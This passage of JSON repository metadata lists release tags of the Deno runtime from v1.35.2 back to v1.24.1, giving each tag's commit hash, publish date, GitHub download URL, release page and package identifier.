ad.github.com/denoland/deno/tar.gz/v1.35.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2/manifests"},{"name":"v1.35.1","sha":"b4824bf45f3d12e1b53e7eb5afcd49c38a575210","kind":"commit","published_at":"2023-07-12T21:49:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1/manifests"},{"name":"v1.35.0","sha":"1ac5fddf54a828f1372e1ff10559d1a4bc70e5c9","kind":"commit","published_at":"2023-07-04T23:58:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0/manifests"},{"name":"v1.34.3","sha":"ef24d1a0b7fb7f3297cbda1d80df6e1f72bef252","kind":"commit","published_at":"2023-06-15T22:16:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3/manifests"},{"name":"v1.34.2","sha":"acf5d44a221b84e92bd0f6b1be5e6b08fcfb5a32","kind":"commit","published_at":"2023-06-09T00:13:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2/manifests"},{"name":"v1.34.1","sha":"ea6cd3f1fccd5a621582788a4949d40d5fcdcd1b","kind":"commit","published_at":"2023-05-29T23:30:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1/manifests"},{"name":"v1.34.0","sha":"935071dd0e233a55c93ca4792f9210f0ea6bccc6","kind":"commit","published_at":"2023-05-24T23:38:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0/manifests"},{"name":"v1.33.4","sha":"5be97b7584c712848336da90077db86fe4859d96","kind":"commit","published_at":"2023-05-18T16:21:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4/manifests"},{"name":"v1.33.3","sha":"12ba2d311bb6cce7c1bf2567748987e91585d540","kind":"commit","published_at":"2023-05-12T11:06:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3/manifests"},{"name":"v1.33.2","sha":"c2a61a4192609615beba363f5606e6e04ae60c97","kind":"commit","published_at":"2023-05-04T14:39:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2/manifests"},{"name":"v1.33.1","sha":"d5f52ef7ac20cb116fad574e3017f194124be312","kind":"commit","published_at":"2023-04-28T17:05:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1/manifests"},{"name":"v1.33.0","sha":"39ece1fe0ddacc2cbf182403c9e7085bc01df5a6","kind":"commit","published_at":"2023-04-27T23:18:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0/manifests"},{"name":"v1.32.5","sha":"6cfca9b33eb0647fc73ddfc20349ae9fb943d01a","kind":"commit","published_at":"2023-04-18T18:31:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5/manifests"},{"name":"v1.32.4","sha":"709cfd6d91d335c16337be9339d45250e02ae247","kind":"commit","published_at":"2023-04-12T15:17:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4/manifests"},{"name":"v1.32.3","sha":"73d472149ce6dd360a71ca5d1819d3f8f27754f8","kind":"commit","published_at":"2023-04-01T22:51:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3/manifests"},{"name":"v1.32.2","sha":"24e0b31096682f0ec576e0021c1925611ec4e090","kind":"commit","published_at":"2023-03-31T20:41:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2/manifests"},{"name":"v1.32.1","sha":"99b5eaa2f4f81b0f6fb46a388808a0d8f40b91e1","kind":"commit","published_at":"2023-03-23T20:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1/manifests"},{"name":"v1.32.0","sha":"d06fdf6add1b3c55fc5f4a24956f17a363d513a4","kind":"commit","published_at":"2023-03-22T23:03:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0/manifests"},{"name":"v1.31.3","sha":"f64adbe1a3b924b9436afa39b4302c5718bbb759","kind":"commit","published_at":"2023-03-16T05:41:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3/manifests"},{"name":"v1.31.2","sha":"fc6edac5978e7a5e44fdcee05085c7492f0ccba9","kind":"commit","published_at":"2023-03-10T06:41:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2/manifests"},{"name":"v1.31.1","sha":"86785f21194460d713276dca212302fa1bb1c943","kind":"commit","published_at":"2023-02-25T02:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1/manifests"},{"name":"v1.31.0","sha":"b6ac54815c1bcfa44a45b3f2c1c982829482477f","kind":"commit","published_at":"2023-02-24T00:20:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0/manifests"},{"name":"v1.30.3","sha":"f3fb8ee18826e66d3896ea864d2bedaed6c79308","kind":"commit","published_at":"2023-02-07T01:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3/manifests"},{"name":"v1.30.2","sha":"cee13304ffe58286fcfab3526c46f95a7e23825d","kind":"commit","published_at":"2023-02-03T14:46:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2/manifests"},{"name":"v1.30.1","sha":"000fb83c587a17118d83b990f1d08c98bb9cce2a","kind":"commit","published_at":"2023-02-02T14:26:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1/manifests"},{"name":"v1.30.0","sha":"a6f915c22f34921780b4bcb8b6da8cd3bd20d5a8","kind":"commit","published_at":"2023-01-25T23:15:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0/manifests"},{"name":"v1.29.4","sha":"65db94feba9d4d51a09b74629f566dbc90484fba","kind":"commit","published_at":"2023-01-16T22:07:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4/manifests"},{"name":"v1.29.3","sha":"9806dcc91496ab12c7fba238d411e23c22e2a302","kind":"commit","published_at":"2023-01-13T17:17:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3/manifests"},{"name":"v1.29.2","sha":"14c4c8f9340235bd1ddb5388558c984beb0bb6d9","kind":"commit","published_at":"2023-01-05T13:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2/manifests"},{"name":"v1.29.1","sha":"145013ab7fb00c7293ce33806f26dc4083a8da66","kind":"commit","published_at":"2022-12-15T16:32:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1/manifests"},{"name":"v1.29.0","sha":"0d4e4af7acf82c1365999a7281910daa05f0e982","kind":"commit","published_at":"2022-12-14T23:22:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0/manifests"},{"name":"v1.28.3","sha":"74064c9d8c222b33b2a552ea0af1054f57002a96","kind":"commit","published_at":"2022-12-01T10:10:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3/manifests"},{"name":"v1.28.2","sha":"1aca16e23998ee54f6a15217cd4cc6b8b13299b7","kind":"commit","published_at":"2022-11-24T20:22:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2/manifests"},{"name":"v1.28.1","sha":"2743d42099cb0596f03c7d1252e5cfbb53f7a9ec","kind":"commit","published_at":"2022-11-16T23:35:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1/manifests"},{"name":"v1.28.0","sha":"916598f8a77d1fb7b7feb577e600ead2bc45045f","kind":"commit","published_at":"2022-11-13T20:31:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0/manifests"},{"name":"v1.27.2","sha":"5cd5cfa8d655e8a71441cf9736df93efde75153c","kind":"commit","published_at":"2022-11-08T21:42:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2/manifests"},{"name":"v1.27.1","sha":"d448c2950db2ed474405ace6a0a180301eeaa68d","kind":"commit","published_at":"2022-11-03T21:52:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1/manifests"},{"name":"v1.27.0","sha":"b0fb8fa9dc08640e77eb0ab888a483db18a52a4b","kind":"commit","published_at":"2022-10-27T15:13:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0/manifests"},{"name":"v1.26.2","sha":"d1f432bf12e5de645d45f1f2738a53981f39fa5b","kind":"commit","published_at":"2022-10-17T18:51:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2/manifests"},{"name":"v1.26.1","sha":"753b60dd9b0c9bb5220609f2fe65ad06957690d6","kind":"commit","published_at":"2022-10-06T17:16:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1/manifests"},{"name":"v1.26.0","sha":"d8827514ffef04c2e1732f7033ff6a374dd94d54","kind":"commit","published_at":"2022-09-28T22:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0/manifests"},{"name":"v1.25.4","sha":"02afbe2af550ad5223d982e8fdd37f778b9d828c","kind":"commit","published_at":"2022-09-22T18:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4/manifests"},{"name":"v1.25.3","sha":"f561e765a75c749f1d1e2d6584edf6018435e6e1","kind":"commit","published_at":"2022-09-15T17:46:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3/manifests"},{"name":"v1.25.2","sha":"3c5af2ba495b2d5770b3f5ed12e202ba2089ebda","kind":"commit","published_at":"2022-09-09T08:54:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2/manifests"},{"name":"v1.25.1","sha":"1e78804d5c0b8204978dd77431ac33d8d16ce5bc","kind":"commit","published_at":"2022-09-02T00:07:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1/manifests"},{"name":"v1.25.0","sha":"8986e2ced4adbf6185aea02a580036aa92c2872c","kind":"commit","published_at":"2022-08-24T22:20:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0/manifests"},{"name":"v1.24.3","sha":"c79127061438234a60f63cf9d0a276328961f971","kind":"commit","published_at":"2022-08-11T18:38:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3/manifests"},{"name":"v1.24.2","sha":"44ade24fb213875814c431c87abb3f79ecab1fef","kind":"commit","published_at":"2022-08-04T20:49:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2/manifests"},{"name":"v1.24.1","sha":"fa9698fe9ec3ceb660c1865eb75f07a0bc5b90c5","kind":"commit","published_at":"2022-07-28T17:22:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.1","html_url":"https://github.com/denoland/deno